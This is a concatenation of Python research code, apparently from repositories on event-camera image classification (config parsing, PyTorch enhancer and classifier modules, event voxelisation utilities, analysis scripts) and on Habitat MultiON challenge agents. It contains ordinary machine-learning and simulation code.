read_config = configparser.ConfigParser()
config_name = Path(config_path).stem
read_config.read(config_path)
config_attribs = []
data_dict = {}
for section in read_config.sections():
for (key, value) in read_config.items(section):
config_attribs.append(key)
data_dict[key] = parse_value(value) if key not in NO_PARSE else value
if key in EXCEPT_NONE and value == 'None': # Account for None
data_dict[key] = None
# Modify name just in case of errors
data_dict['name'] = config_name
Config = namedtuple('Config', config_attribs)
cfg = Config(**data_dict)
return cfg
def parse_value(value):
if value.replace('.', '', 1).replace('+', '', 1).replace('-', '', 1).replace('e', '', 1).isdigit():
# Exponential format and decimal format should be accounted for
return literal_eval(value)
elif value == 'True' or value == 'False':
if value == 'True':
return True
else:
return False
elif value == 'None':
return None
elif ',' in value: # Config contains lists
is_number = any(char.isdigit() for char in value.split(',')[0])
items_list = value.split(',')
if '' in items_list:
items_list.remove('')
if is_number:
return [literal_eval(val) for val in items_list]
else:
if '\"' in items_list[0] or '\'' in items_list[0]:
return [literal_eval(val.strip()) for val in items_list]
else:
return [val.strip() for val in items_list]
else:
return value
```
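A small end-to-end example of the parser above; the .ini contents and field names are made up for illustration.
```python
ini_text = """[Default]
name = demo_run
load_model = None
lr = 3e-4
use_cuda = True
channels = 4, 8
"""
with open("/tmp/demo_run.ini", "w") as f:
    f.write(ini_text)

cfg = parse_ini("/tmp/demo_run.ini")
print(cfg.name, cfg.lr, cfg.use_cuda, cfg.channels)  # demo_run 0.0003 True [4, 8]
```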
#### File: real_cnn_model/exp_utils/tent_exp.py
```python
from real_cnn_model.data.data_container import EvTTAImageNetContainer
from real_cnn_model.models.model_container import EvTTACNNContainer
from real_cnn_model.train.trainer import EvTTACNNTrainer
import configparser
def run_exp(cfg):
"""
Run normal train / test
Args:
cfg: Config file containing configs related to experiment
"""
# Make instance of data container
data_container = EvTTAImageNetContainer(cfg)
# Make instance of model container
model_container = EvTTACNNContainer(cfg)
# Make instance of trainer
trainer = EvTTACNNTrainer(cfg, model_container, data_container)
config = configparser.ConfigParser()
config.add_section('Default')
cfg_dict = cfg._asdict()
for key in cfg_dict:
if key != 'name':
config['Default'][key] = str(cfg_dict[key]).replace('[', '').replace(']', '')
else:
config['Default'][key] = str(cfg_dict[key])
with open(trainer.exp_save_dir / 'config.ini', 'w') as configfile:
config.write(configfile)
# Display model
print(model_container.models['model'])
trainer.run()
```
#### File: real_cnn_model/models/enhanced_classifier.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
try:
import torchsort
except ModuleNotFoundError:
# TODO: Install torchsort in other servers
pass
"""
URIE excerpted from https://github.com/taeyoungson/urie/
"""
class Selector(nn.Module):
def __init__(self, channel, reduction=16, crp_classify=False):
super(Selector, self).__init__()
self.spatial_attention = 4
self.in_channel = channel * (self.spatial_attention ** 2)
self.avg_pool = nn.AdaptiveAvgPool2d((self.spatial_attention, self.spatial_attention))
self.fc = nn.Sequential(
nn.Linear(self.in_channel, self.in_channel // reduction, bias=False),
nn.ReLU(inplace=True),
)
self.att_conv1 = nn.Linear(self.in_channel // reduction, self.in_channel)
self.att_conv2 = nn.Linear(self.in_channel // reduction, self.in_channel)
def forward(self, x):
b, c, H, W = x.size()
y = self.avg_pool(x).view(b, -1)
y = self.fc(y)
att1 = self.att_conv1(y).view(b, c, self.spatial_attention, self.spatial_attention)
att2 = self.att_conv2(y).view(b, c, self.spatial_attention, self.spatial_attention)
attention = torch.stack((att1, att2))
attention = nn.Softmax(dim=0)(attention)
att1 = F.interpolate(attention[0], scale_factor=(H / self.spatial_attention, W / self.spatial_attention), mode="nearest")
att2 = F.interpolate(attention[1], scale_factor=(H / self.spatial_attention, W / self.spatial_attention), mode="nearest")
return att1, att2
class SelectiveConv(nn.Module):
def __init__(self, kernel_size, padding, bias, reduction, in_channels, out_channels, first=False):
super(SelectiveConv, self).__init__()
self.first = first
self.conv1 = nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, padding=padding, bias=bias)
self.conv2 = nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, padding=padding, bias=bias)
self.selector = Selector(out_channels, reduction=reduction)
self.IN = nn.InstanceNorm2d(in_channels)
self.BN = nn.BatchNorm2d(in_channels)
self.relu = nn.LeakyReLU(inplace=True)
def forward(self, x):
if self.first:
f_input = x
s_input = x
else:
f_input = self.BN(x)
f_input = self.relu(f_input)
s_input = self.IN(x)
s_input = self.relu(s_input)
out1 = self.conv1(f_input)
out2 = self.conv2(s_input)
out = out1 + out2
att1, att2 = self.selector(out)
out = torch.mul(out1, att1) + torch.mul(out2, att2)
return out
class SKDown(nn.Module):
def __init__(self, kernel_size, padding, bias, reduction, in_channels, out_channels, first=False):
super(SKDown, self).__init__()
self.maxpool_conv = nn.Sequential(
nn.MaxPool2d(2),
SelectiveConv(kernel_size, padding, bias, reduction, in_channels, out_channels, first=first)
)
def forward(self, x):
return self.maxpool_conv(x)
class SKUp(nn.Module):
def __init__(self, kernel_size, padding, bias, reduction, in_channels, out_channels, bilinear=True):
super().__init__()
# if bilinear, use the normal convolutions to reduce the number of channels
if bilinear:
self.up = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True)
else:
self.up = nn.ConvTranspose2d(in_channels // 2, in_channels // 2, kernel_size=2, stride=2)
self.conv = SelectiveConv(kernel_size, padding, bias, reduction, in_channels, out_channels)
def forward(self, x1, x2):
x1 = self.up(x1)
diffY = torch.tensor([x2.size()[2] - x1.size()[2]])
diffX = torch.tensor([x2.size()[3] - x1.size()[3]])
x1 = F.pad(x1, [diffX // 2, diffX - diffX // 2,
diffY // 2, diffY - diffY // 2])
x = torch.cat([x2, x1], dim=1)
return self.conv(x)
class OutConv(nn.Module):
# Completed as the standard 1x1 output convolution used in U-Net-style models (assumed; the original body was left as `pass`)
def __init__(self, in_channels, out_channels):
super(OutConv, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size=1)
def forward(self, x):
return self.conv(x)
class SKUNet(nn.Module):
def __init__(self, num_channels, in_kernel_size, mid_kernel_size, bilinear=True):
super(SKUNet, self).__init__()
self.bilinear = bilinear
self.down1 = nn.Conv2d(kernel_size=in_kernel_size, padding=in_kernel_size // 2, in_channels=num_channels, out_channels=32)
self.down2 = SKDown(mid_kernel_size, mid_kernel_size // 2, False, 16, 32, 64)
self.down3 = SKDown(mid_kernel_size, mid_kernel_size // 2, False, 16, 64, 64)
self.up1 = SKUp(mid_kernel_size, mid_kernel_size // 2, False, 16, 128, 32, bilinear)
self.up2 = SKUp(mid_kernel_size, mid_kernel_size // 2, False, 16, 64, 16, bilinear)
self.up3 = nn.Conv2d(kernel_size=mid_kernel_size, padding=mid_kernel_size // 2, in_channels=16, out_channels=num_channels)
def forward(self, x):
x_origin = x
x1 = self.down1(x)
x2 = self.down2(x1)
x3 = self.down3(x2)
x = self.up1(x3, x2)
x = self.up2(x, x1)
x = self.up3(x)
return torch.add(x, x_origin)
# DiffDiST and helper classes
class LinearExp(nn.Module):
def __init__(self, n_in, n_out):
super(LinearExp, self).__init__()
self.weight = nn.Parameter(torch.zeros(n_in, n_out))
self.bias = nn.Parameter(torch.zeros(n_out))
def forward(self, x):
A = torch.exp(self.weight)
return x @ A + self.bias
class ChannelModulation(nn.Module):
def __init__(self, n_in):
super(ChannelModulation, self).__init__()
self.weight = nn.Parameter(torch.ones(n_in), requires_grad=True)
self.bias = nn.Parameter(torch.zeros(n_in), requires_grad=True)
def forward(self, x):
return (x.permute(0, 2, 3, 1) * self.weight + self.bias).permute(0, 3, 1, 2)
class TensorMixer(nn.Module):
def __init__(self, n_in, init_alpha, init_beta):
super(TensorMixer, self).__init__()
self.alpha = nn.Parameter(torch.zeros(n_in).fill_(init_alpha), requires_grad=True)
self.beta = nn.Parameter(torch.zeros(n_in).fill_(init_beta), requires_grad=True)
self.bias = nn.Parameter(torch.zeros(n_in), requires_grad=True)
def forward(self, x1, x2):
# x1, x2 are assumed to have shape (B x C x H x W)
return (x1.permute(0, 2, 3, 1) * self.alpha + x2.permute(0, 2, 3, 1) * self.beta + self.bias).permute(0, 3, 1, 2)
class TransConvBlock(nn.Module):
def __init__(self, n_in, n_hid):
super(TransConvBlock, self).__init__()
self.conv2d = nn.Conv2d(n_in, n_hid, kernel_size=3, padding=1)
self.group_norm = nn.GroupNorm(n_hid, n_hid)
self.relu = nn.ReLU()
def forward(self, x):
x = self.conv2d(x)
x = self.group_norm(x)
x = self.relu(x)
return x
class InputTranformNet(nn.Module):
def __init__(self, n_in, n_hid=18, n_layers=6):
super(InputTranformNet, self).__init__()
self.channel_mod = ChannelModulation(n_in)
self.tau = nn.Parameter(torch.ones(1), requires_grad=True)
# Make layers
layers = []
for idx in range(n_layers):
if idx == 0:
layers.append(TransConvBlock(n_in, n_hid))
elif idx == n_layers - 1:
layers.append(TransConvBlock(n_hid, n_in))
else:
layers.append(TransConvBlock(n_hid, n_hid))
self.res_transform = nn.Sequential(*layers)
def forward(self, x):
res_x = self.res_transform(x)
x = self.tau * x + (1 - self.tau) * res_x
x = self.channel_mod(x)
return x
class DiffDiST(nn.Module):
def __init__(self, init_alpha=1.0, init_beta=0.0, init_gamma=1.0, num_groups=4):
# Formula: D = gamma * (argsort(S)) + (1 - gamma) * (monotone(S)), where S = alpha * T + beta * 1 / C
super(DiffDiST, self).__init__()
self.num_groups = num_groups
self.alpha = nn.Parameter(torch.tensor(init_alpha), requires_grad=True)
self.beta = nn.Parameter(torch.tensor(init_beta), requires_grad=True)
self.gamma = nn.Parameter(torch.tensor(init_gamma), requires_grad=True)
def forward(self, x):
print(self.alpha.data.item(), self.beta.data.item(), self.gamma.data.item())
# x is assumed to have shape (B x 4 x H x W)
inv_count = x[:, [0, 2], ...] # (B x 2 x H x W)
time_out = x[:, [1, 3], ...] # (B x 2 x H x W)
result = time_out + self.beta * inv_count
return result
class EnhancedClassifier(nn.Module):
def __init__(self, classifier: nn.Module, enhancer: nn.Module, return_input=False):
super(EnhancedClassifier, self).__init__()
self.classifier = classifier
self.enhancer = enhancer
self.return_input = return_input
def forward(self, x):
if self.return_input:
if self.enhancer is None:
return self.classifier(x), x
else:
x = self.enhancer(x)
return self.classifier(x), x
else:
if self.enhancer is None:
return self.classifier(x)
else:
return self.classifier(self.enhancer(x))
class ProjectionClassifier(nn.Module):
def __init__(self, classifier: nn.Module, projector: nn.Module, return_mode: str):
super(ProjectionClassifier, self).__init__()
self.feature_extractor = nn.Sequential(*list(classifier.children())[:-1])
self.projector = projector
self.final_classifier = classifier.fc
self.return_mode = return_mode
def forward(self, x):
x = self.feature_extractor(x)
x = torch.flatten(x, 1)
proj = x + self.projector(x)
pred = self.final_classifier(proj)
if self.return_mode == 'both':
return pred, proj
elif self.return_mode == 'pred':
return pred
elif self.return_mode == 'proj':
return proj
class Projector(nn.Module):
def __init__(self, dim, hid_dim):
super(Projector, self).__init__()
self.projector = nn.Sequential(nn.Linear(dim, hid_dim, bias=False),
nn.BatchNorm1d(hid_dim),
nn.ReLU(inplace=True), # hidden layer
nn.Linear(hid_dim, dim)) # output layer
def forward(self, x):
return self.projector(x)
```
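A sketch of composing the modules above, using torchvision's resnet18 purely as a placeholder backbone.
```python
import torch
from torchvision.models import resnet18

enhancer = SKUNet(num_channels=3, in_kernel_size=7, mid_kernel_size=3)
model = EnhancedClassifier(classifier=resnet18(num_classes=10), enhancer=enhancer)
logits = model(torch.randn(2, 3, 224, 224))
print(logits.shape)  # torch.Size([2, 10])
```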
#### File: real_cnn_model/utils/convert_utils.py
```python
from numpy.lib.shape_base import split
import torch
from math import ceil
"""
Collection of functions for converting an (N, 4) event tensor into other representations.
"""
def event_to_voxel(event: torch.Tensor, num_bins: int, num_events: int, height: int, width: int):
"""
Convert (N, 4) event tensor into a new tensor of shape (N_e, B, H, W), where B is the number of bins to use,
and N_e = ceil(N / num_events)
Note that event = [x, y, time, polarity]
Args:
event: (N, 4) tensor containing events
num_bins: Number of bins
num_events: Unit number of events to pack to a single voxel batch of (B, H, W)
height: Height of voxel
width: Width of voxel
Returns:
voxel_event: (N_e, B, H, W) tensor containing voxelized events
"""
tgt_event = event.clone().detach()
# Swap x, y for indexing
tgt_event = torch.index_select(tgt_event, 1, torch.LongTensor([1, 0, 2, 3]))
N_e = ceil(tgt_event.shape[0] / num_events)
voxel_event = torch.zeros([N_e, num_bins, height, width])
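# Each slice of num_events events is binned into a (num_bins, H, W) grid: every event
# spreads its polarity between the two temporally adjacent bins (floor/ceil of its
# normalized timestamp) with linear weights, so the total contribution per event is preserved.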
for idx in range(N_e):
sliced_event = tgt_event[num_events * (idx): num_events * (idx + 1)]
time_step = sliced_event[-1, 2] - sliced_event[0, 2]
# Normalize time
sliced_event[:, 2] = num_bins * (sliced_event[:, 2] - sliced_event[0, 2]) / time_step
floor_event = sliced_event.clone().detach()
floor_event[:, 2] = torch.floor(sliced_event[:, 2])
floor_event[:, 3] = sliced_event[:, 3] * (1 - (sliced_event[:, 2] - torch.floor(sliced_event[:, 2])))
ceil_event = sliced_event.clone().detach()
ceil_event[:, 2] = torch.ceil(sliced_event[:, 2])
ceil_event[:, 3] = sliced_event[:, 3] * (1 - (torch.ceil(sliced_event[:, 2]) - sliced_event[:, 2]))
dummy_bin_event = torch.cat([floor_event, ceil_event], dim=0)
coords = dummy_bin_event[:, 0:3].long()
new_coords = coords[coords[:, 2] < num_bins]
val = dummy_bin_event[:, -1]
val = val[coords[:, 2] < num_bins]
bin_voxel_event = torch.sparse.FloatTensor(new_coords.t(), val, torch.Size([height, width, num_bins])).to_dense()
bin_voxel_event = bin_voxel_event.permute(2, 0, 1)
voxel_event[idx] = bin_voxel_event
return voxel_event
def event_to_spike_tensor(event: torch.Tensor, num_bins: int, num_events: int, height: int, width: int, measure='time'):
"""
Convert (N, 4) event tensor into a new tensor of shape (N_e, 2, B, H, W), where B is the number of bins to use,
and N_e = ceil(N / num_events)
Note that event = [x, y, time, polarity]
Args:
event: (N, 4) tensor containing events
num_bins: Number of bins
num_events: Unit number of events to pack to a single voxel batch of (B, H, W)
height: Height of voxel
width: Width of voxel
Returns:
voxel_event: (N_e, 2, B, H, W) tensor containing the polarity-separated event spike tensor
"""
assert measure in ['time', 'count', 'polarity', 'polarized_time']
tgt_event = event.clone().detach()
# Swap x, y for indexing
tgt_event = torch.index_select(tgt_event, 1, torch.LongTensor([1, 0, 2, 3]))
pos_event = tgt_event[tgt_event[:, -1] > 0]
neg_event = tgt_event[tgt_event[:, -1] < 0]
N_e = ceil(tgt_event.shape[0] / num_events)
voxel_event = torch.zeros([N_e, 2, num_bins, height, width])
for idx in range(N_e):
# Positive Tensor
sliced_event = pos_event[num_events * (idx): num_events * (idx + 1)]
time_step = sliced_event[-1, 2] - sliced_event[0, 2]
# Normalize time
sliced_event[:, 2] = num_bins * (sliced_event[:, 2] - sliced_event[0, 2]) / time_step
floor_event = sliced_event.clone().detach()
floor_event[:, 2] = torch.floor(sliced_event[:, 2])
if measure == 'polarity' or measure == 'count':
floor_event[:, 3] = (1 - (sliced_event[:, 2] - torch.floor(sliced_event[:, 2])))
elif measure == 'time' or measure == 'polarized_time':
norm_time = sliced_event[:, 2] / num_bins
floor_event[:, 3] = norm_time * (1 - (sliced_event[:, 2] - torch.floor(sliced_event[:, 2])))
ceil_event = sliced_event.clone().detach()
ceil_event[:, 2] = torch.ceil(sliced_event[:, 2])
if measure == 'polarity' or measure == 'count':
ceil_event[:, 3] = (1 - (torch.ceil(sliced_event[:, 2]) - sliced_event[:, 2]))
elif measure == 'time' or measure == 'polarized_time':
norm_time = sliced_event[:, 2] / num_bins
ceil_event[:, 3] = norm_time * (1 - (torch.ceil(sliced_event[:, 2]) - sliced_event[:, 2]))
dummy_bin_event = torch.cat([floor_event, ceil_event], dim=0)
coords = dummy_bin_event[:, 0:3].long()
new_coords = coords[coords[:, 2] < num_bins]
val = dummy_bin_event[:, -1]
val = val[coords[:, 2] < num_bins]
bin_voxel_event = torch.sparse.FloatTensor(new_coords.t(), val, torch.Size([height, width, num_bins])).to_dense()
bin_voxel_event = bin_voxel_event.permute(2, 0, 1)
voxel_event[idx, 0] = bin_voxel_event
# Negative Tensor
sliced_event = neg_event[num_events * (idx): num_events * (idx + 1)]
time_step = sliced_event[-1, 2] - sliced_event[0, 2]
# Normalize time
sliced_event[:, 2] = num_bins * (sliced_event[:, 2] - sliced_event[0, 2]) / time_step
floor_event = sliced_event.clone().detach()
floor_event[:, 2] = torch.floor(sliced_event[:, 2])
if measure == 'polarity':
floor_event[:, 3] = -(1 - (sliced_event[:, 2] - torch.floor(sliced_event[:, 2])))
elif measure == 'count':
floor_event[:, 3] = (1 - (sliced_event[:, 2] - torch.floor(sliced_event[:, 2])))
elif measure == 'time':
norm_time = sliced_event[:, 2] / num_bins
floor_event[:, 3] = norm_time * (1 - (sliced_event[:, 2] - torch.floor(sliced_event[:, 2])))
elif measure == 'polarized_time':
norm_time = sliced_event[:, 2] / num_bins
floor_event[:, 3] = -norm_time * (1 - (sliced_event[:, 2] - torch.floor(sliced_event[:, 2])))
ceil_event = sliced_event.clone().detach()
ceil_event[:, 2] = torch.ceil(sliced_event[:, 2])
if measure == 'polarity':
ceil_event[:, 3] = -(1 - (torch.ceil(sliced_event[:, 2]) - sliced_event[:, 2]))
elif measure == 'count':
ceil_event[:, 3] = (1 - (torch.ceil(sliced_event[:, 2]) - sliced_event[:, 2]))
elif measure == 'time':
norm_time = sliced_event[:, 2] / num_bins
ceil_event[:, 3] = norm_time * (1 - (torch.ceil(sliced_event[:, 2]) - sliced_event[:, 2]))
elif measure == 'polarized_time':
norm_time = sliced_event[:, 2] / num_bins
ceil_event[:, 3] = -norm_time * (1 - (torch.ceil(sliced_event[:, 2]) - sliced_event[:, 2]))
dummy_bin_event = torch.cat([floor_event, ceil_event], dim=0)
coords = dummy_bin_event[:, 0:3].long()
new_coords = coords[coords[:, 2] < num_bins]
val = dummy_bin_event[:, -1]
val = val[coords[:, 2] < num_bins]
bin_voxel_event = torch.sparse.FloatTensor(new_coords.t(), val, torch.Size([height, width, num_bins])).to_dense()
bin_voxel_event = bin_voxel_event.permute(2, 0, 1)
voxel_event[idx, 1] = bin_voxel_event
return voxel_event
def event_to_voxel_full(event: torch.Tensor, num_bins, height, width, sparse=False):
"""
Convert all the events to single voxel batch of shape (B, H, W)
"""
if sparse:
return event_to_voxel_sparse(event, num_bins, len(event), height, width)
else:
return event_to_voxel(event, num_bins, len(event), height, width).squeeze(0)
def event_to_spike_tensor_full(event: torch.Tensor, num_bins, height, width, measure='time'):
"""
Convert all the events to single event spike tensor of shape (2, B, H, W)
"""
return event_to_spike_tensor(event, num_bins, len(event), height, width, measure)
def event_to_count_voxel_full(event: torch.Tensor, num_bins, height, width):
"""
Convert all the events to single event voxel of shape (B, H, W)
"""
split_length = [event.shape[0] // num_bins] * num_bins if event.shape[0] % num_bins == 0 \
else [event.shape[0] // num_bins] * (num_bins - 1) + [event.shape[0] // num_bins + event.shape[0] % num_bins]
split_event = torch.split(event, split_length, dim=0)
voxel_event = torch.zeros([num_bins, height, width])
for idx, evt in enumerate(split_event):
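# Flatten (x, y) into a single linear index (x + y * width) so one bincount call
# yields the per-pixel event count for this temporal slice.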
voxel_event[idx] = torch.bincount(evt[:, 0].long() + evt[:, 1].long() * width, minlength=height * width).reshape(height, width)
return voxel_event, split_length
def event_to_voxel_sparse(event: torch.Tensor, num_bins: int, num_events: int, height: int, width: int):
"""
Convert (N, 4) event tensor into a new tensor of shape (N_e, B, H, W), where B is the number of bins to use,
and N_e = ceil(N / num_events). This method returns the coordinates and values of the resulting tensor, instead
of the tensor itself, for further use in sparse convolution.
Note that event = [x, y, time, polarity]
Args:
event: (N, 4) tensor containing events
num_bins: Number of bins
num_events: Unit number of events to pack to a single voxel batch of (B, H, W)
height: Height of voxel
width: Width of voxel
Returns:
tot_coords: (N_tot, 3) tensor containing (y, x, bin) coordinates of the resulting tensor
tot_vals: (N_tot, ) tensor containing values of the resulting tensor
"""
tgt_event = event.clone().detach()
# Swap x, y for indexing
tgt_event = torch.index_select(tgt_event, 1, torch.LongTensor([1, 0, 2, 3]))
N_e = ceil(tgt_event.shape[0] / num_events)
tot_coords = []
tot_vals = []
for idx in range(N_e):
sliced_event = tgt_event[num_events * (idx): num_events * (idx + 1)]
time_step = sliced_event[-1, 2] - sliced_event[0, 2]
# Normalize time
sliced_event[:, 2] = num_bins * (sliced_event[:, 2] - sliced_event[0, 2]) / time_step
floor_event = sliced_event.clone().detach()
floor_event[:, 2] = torch.floor(sliced_event[:, 2])
floor_event[:, 3] = sliced_event[:, 3] * (1 - (sliced_event[:, 2] - torch.floor(sliced_event[:, 2])))
ceil_event = sliced_event.clone().detach()
ceil_event[:, 2] = torch.ceil(sliced_event[:, 2])
ceil_event[:, 3] = sliced_event[:, 3] * (1 - (torch.ceil(sliced_event[:, 2]) - sliced_event[:, 2]))
dummy_bin_event = torch.cat([floor_event, ceil_event], dim=0)
coords = dummy_bin_event[:, 0:3].long()
new_coords = coords[coords[:, 2] != num_bins]
val = dummy_bin_event[:, -1]
val = val[coords[:, 2] != num_bins]
tot_coords.append(new_coords)
tot_vals.append(val)
tot_coords = torch.cat(tot_coords, dim=0)
tot_vals = torch.cat(tot_vals, dim=0)
return tot_coords, tot_vals
if __name__ == '__main__':
x = torch.load('/Datasets/imagenet_train_1278567.pt')
z = event_to_voxel_full(x, 10, 224, 224, sparse=True)
breakpoint()
```
#### File: real_cnn_model/utils/train_logistic.py
```python
import sys
import tqdm
import numpy as np
from pathlib import Path
import random
import torch
from sklearn.linear_model import LogisticRegression, LinearRegression
from sklearn.neural_network import MLPClassifier, MLPRegressor
from sklearn.ensemble import RandomForestClassifier
file_list = sys.argv[1]
pred_file = sys.argv[2]
label_file = sys.argv[3]
SENSOR_H = 480
SENSOR_W = 640
IMAGE_H = 224
IMAGE_W = 224
stat_list = ['speed', 'proj_cnt', 'var', 'grad']
def load_event(event_path):
# Returns time-shifted numpy array event from event_path
event = np.load(event_path)
event = np.vstack([event['x_pos'], event['y_pos'], event['timestamp'], event['polarity']]).T
# Account for non-zero minimum time
if event[:, 2].min() != 0:
event[:, 2] -= event[:, 2].min()
event = event.astype(np.float)
# Account for int-type timestamp
event[:, 2] /= 1000000
# Account for zero polarity
if event[:, 3].min() >= -0.5:
event[:, 3][event[:, 3] <= 0.5] = -1
event[:, 0] *= (IMAGE_W / SENSOR_W)
event[:, 1] *= (IMAGE_H / SENSOR_H)
return event
def get_speed(event_path):
event = load_event(event_path)
return len(event) / ((event[-1, 2] - event[0, 2]) * 1000000.)
def get_bundle_speed(event_path):
event = load_event(event_path)
event = event[:20000]
return len(event) / ((event[-1, 2] - event[0, 2]) * 1000000.)
def get_stats(event_path, idx=None):
event = torch.from_numpy(load_event(event_path))
length = 20000
if idx is not None:
coords = event[idx: idx + length, :2].long()
else:
coords = event[:, :2].long()
event_image = torch.zeros([IMAGE_H, IMAGE_W])
event_image[(coords[:, 1], coords[:, 0])] = 1.0
value_list = []
if 'speed' in stat_list:
length = 20000
avg_speed = 0.0
num_samples = 10
if idx is not None:
event = event[idx: idx + length]
avg_speed = len(event) / ((event[-1, 2] - event[0, 2]) * 1000000.)
else:
if len(event) > length:
for _ in range(num_samples):
start = random.choice(range(len(event) - length + 1))
sample_event = event[start: start + length]
avg_speed += len(sample_event) / ((sample_event[-1, 2] - sample_event[0, 2]) * 1000000.)
avg_speed = avg_speed / num_samples
else:
avg_speed += len(event) / ((event[-1, 2] - event[0, 2]) * 1000000.)
value_list.append(avg_speed)
if 'proj_cnt' in stat_list:
proj_cnt = torch.mean(event_image).item()
value_list.append(proj_cnt)
if 'grad' in stat_list:
gy, gx = np.gradient(event_image.numpy())
gnorm = np.sqrt(gx**2 + gy**2)
sharpness = np.average(gnorm)
value_list.append(sharpness)
if 'var' in stat_list:
var = torch.var(event_image)
value_list.append(var)
return value_list
if __name__ == '__main__':
if '.pt' in file_list:
result_tensor = torch.load(file_list)
else:
file_list = open(file_list, 'r').readlines()
idx_list = [int(s.strip().split(':')[1]) for s in file_list]
file_list = [(Path(s.strip().split(':')[0])) for s in file_list]
result_list = [get_stats(event_path, idx) for event_path, idx in tqdm.tqdm(zip(file_list, idx_list), total=len(file_list))]
result_tensor = torch.tensor(result_list).numpy()
"""
preds = torch.load(pred_file).cpu().numpy()
labels = torch.load(label_file).cpu().numpy()
inference_result = (preds.argmax(-1) == labels)
clf = LogisticRegression(random_state=0, verbose=2, max_iter=10000).fit(result_tensor, inference_result)
# clf = MLPClassifier(alpha=1, max_iter=1000, verbose=2).fit(result_tensor, inference_result)
# clf = RandomForestClassifier(max_depth=5, n_estimators=10, verbose=2).fit(result_tensor, inference_result)
print("Accuracy: ", clf.score(result_tensor, inference_result))
# print("Weights: ", clf.coef_, "Bias: ", clf.intercept_)
# torch.save(result_tensor, Path(sys.argv[1]).parent / (Path(sys.argv[1]).stem + "_speed.pt"))
"""
# Regression
preds = torch.load(pred_file).cpu()
preds = torch.softmax(preds, dim=-1).numpy()
labels = torch.load(label_file).cpu().numpy()
model_score = preds[torch.arange(50000).reshape(-1, 1), labels.reshape(-1, 1)].squeeze()
reg = MLPRegressor(random_state=1, max_iter=500, verbose=2, solver='adam', learning_rate_init=0.0003).fit(result_tensor, model_score)
print(reg.score(result_tensor, model_score))
```
#### File: real_cnn_model/utils/warp_events.py
```python
import sys
import tqdm
import numpy as np
from pathlib import Path
import random
import torch
from scipy.optimize import minimize
import matplotlib.pyplot as plt
file_list = sys.argv[1]
SENSOR_H = 480
SENSOR_W = 640
IMAGE_H = 224
IMAGE_W = 224
VISUALIZE = True
LENGTH = 50000
START_IDX = 0
OBJECTIVE = 'gradient'
def load_event(event_path):
# Returns time-shifted numpy array event from event_path
event = np.load(event_path)['event_data']
event = np.vstack([event['x'], event['y'], event['t'], event['p'].astype(np.uint8)]).T
event = event.astype(np.float)
# Account for non-zero minimum time
if event[:, 2].min() != 0:
event[:, 2] -= event[:, 2].min()
# Account for int-type timestamp
# event[:, 2] /= 1000000
# Account for zero polarity
if event[:, 3].min() >= -0.5:
event[:, 3][event[:, 3] <= 0.5] = -1
event[:, 0] *= (IMAGE_W / SENSOR_W)
event[:, 1] *= (IMAGE_H / SENSOR_H)
return event
def display_event(event):
event_image = np.zeros([IMAGE_H, IMAGE_W])
coords = event[:, :2].astype(np.int32)
event_image[(coords[:, 1], coords[:, 0])] = 1.0
plt.imshow(event_image)
plt.show()
def warp_event(event_path):
event = load_event(event_path)
speed = np.zeros(2)
display_event(event)
def tgt_func(x):
tgt_event = np.array(event[START_IDX:START_IDX + LENGTH])
tgt_event[:, 0] = tgt_event[:, 0] + x[0] * (tgt_event[START_IDX, 2] - tgt_event[:, 2])
tgt_event[:, 1] = tgt_event[:, 1] + x[1] * (tgt_event[START_IDX, 2] - tgt_event[:, 2])
coords = tgt_event[:, :2].astype(np.int32)
coords[:, 0] = np.clip(coords[:, 0], 0, IMAGE_W - 1)
coords[:, 1] = np.clip(coords[:, 1], 0, IMAGE_H - 1)
event_image = np.zeros([IMAGE_H, IMAGE_W])
event_image[(coords[:, 1], coords[:, 0])] = 1.0
plt.imshow(event_image)
plt.show()
obj_value = 0.0
if OBJECTIVE == 'proj_cnt':
obj_value = np.average(event_image)
elif OBJECTIVE == 'gradient':
gy, gx = np.gradient(event_image)
gnorm = np.sqrt(gx**2 + gy**2)
obj_value = -np.average(gnorm)
elif OBJECTIVE == 'variance':
obj_value = -np.var(event_image)
print(obj_value)
return obj_value
result = minimize(tgt_func, speed, bounds=[(-1.0 / 1000, 1.0 / 1000), (-1.0 / 1000, 1.0 / 1000)])
speed = result.x
event[:, 0] = event[:, 0] + speed[0] * (event[START_IDX, 2] - event[:, 2])
event[:, 1] = event[:, 1] + speed[1] * (event[START_IDX, 2] - event[:, 2])
event[:, 0] = np.clip(event[:, 0], 0, IMAGE_W - 1)
event[:, 1] = np.clip(event[:, 1], 0, IMAGE_H - 1)
display_event(event)
import pdb; pdb.set_trace()
return result
def save_event(event_tensor, save_path):
pass
if __name__ == '__main__':
file_list = open(file_list, 'r').readlines()
file_list = [Path(s.strip()) for s in file_list]
for event_path in tqdm.tqdm(file_list):
result_event = warp_event(event_path)
save_path = 'tmp'
save_event(result_event, save_path)
``` |
{
"source": "82magnolia/multion-challenge",
"score": 3
} |
#### File: 82magnolia/multion-challenge/evaluate.py
```python
import argparse
import os
import random
# import sys
# sys.path.insert(0, "")
import numpy as np
import habitat
from habitat.core.challenge import Challenge
class RandomWalker(habitat.Agent):
def __init__(self):
self._POSSIBLE_ACTIONS = np.array([0,1,2,3])
def reset(self):
pass
def act(self, observations):
return {"action": np.random.choice(self._POSSIBLE_ACTIONS)}
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"--phase", type=str, required=False, choices=["dev", "standard", "challenge"]
)
args = parser.parse_args()
phase = args.phase
agent = RandomWalker()
challenge = Challenge(phase = phase)
challenge.submit(agent)
if __name__ == "__main__":
main()
``` |
{
"source": "82magnolia/SGoLAM",
"score": 3
} |
#### File: SGoLAM/agents/example.py
```python
from random import Random
import numpy as np
import habitat
"""
In order to use evaluate.py, please implement the following:
1. A walker that inherits habitat.Agent.
2. The walker must implement reset() and act() methods.
3. A get_agent function that returns a walker instance, with the same signature as below.
"""
class ExampleWalker(habitat.Agent):
def __init__(self):
self._POSSIBLE_ACTIONS = np.array([0,1,2,3])
def reset(self):
pass
def act(self, observations):
return {"action": np.random.choice(self._POSSIBLE_ACTIONS)}
def get_agent(exp_config, challenge, checkpoint_path=None):
return ExampleWalker()
```
